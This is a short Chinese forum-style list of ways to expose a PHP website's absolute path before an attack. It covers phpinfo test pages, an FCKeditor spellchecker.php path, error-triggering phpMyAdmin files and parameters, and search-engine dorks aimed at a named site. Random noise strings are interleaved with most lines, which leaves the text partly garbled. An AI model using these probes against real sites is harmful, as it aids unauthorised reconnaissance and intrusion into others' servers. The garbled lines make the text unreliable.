1.测试test.php info.php php_info.php phpinfo.php* J x/ Z0 L+ H, ]
% c8 [+ m o, L9 f7 q3 i! i7 A, c
2.扫描看有没有fck编辑器,如果有就用fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php爆
+ J! D7 D5 V$ g. p- X7 i$ I4 F* B& v; Q U% ]' C
3.看看有没有phpmyadmin或者phpMyAdmin利用phpMyAdmin/libraries/select_lang.lib.php' P, ^* \0 L8 r' V! H5 V6 C
phpMyAdmin/darkblue_orange/layout.inc.php) _, J. R6 Y: `* Y& Z) q4 T
phpMyAdmin/index.php?lang[]=1, H% d2 M/ h: Q9 ?% W
phpmyadmin/themes/darkblue_orange/layout.inc.php2 w& R- w0 L- a9 n
4.利用搜索引擎爆绝对路径 z5 ~: N% I: Q1 e
site:www.huangse.com Warning& T w9 v4 a; s4 o# i0 f G
site:www.huangse.com inurl:Warning
# A$ v1 S: D& F) K: c
, x) X* _" \. @ B- v+ S+ I# K( L等以后慢慢往上补吧,利用单引号的方法俺就不说了。。。
( C+ D' y# l2 D. X |